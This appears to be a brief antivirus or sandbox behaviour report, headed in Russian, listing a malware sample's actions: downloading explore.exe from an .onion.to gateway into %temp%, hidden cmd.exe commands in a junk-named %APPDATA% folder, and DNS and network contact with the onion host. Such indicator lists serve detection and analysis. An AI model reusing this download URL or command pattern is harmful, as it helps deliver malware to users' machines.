Техническая информация
- https://2cbhkcjhn5suq6t6.onion.to/explore.exe как %temp%\hjtudhbj67.exe
- '<SYSTEM32>\cmd.exe' /c cd %APPDATA%\asdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasd...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1904
- %TEMP%\1136732.cvr
- '2c######n5suq6t6.onion.to':443
- DNS ASK 2c######n5suq6t6.onion.to
- '<SYSTEM32>\cmd.exe' /c cd %APPDATA%\asdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasdbcxasdasd...' (со скрытым окном)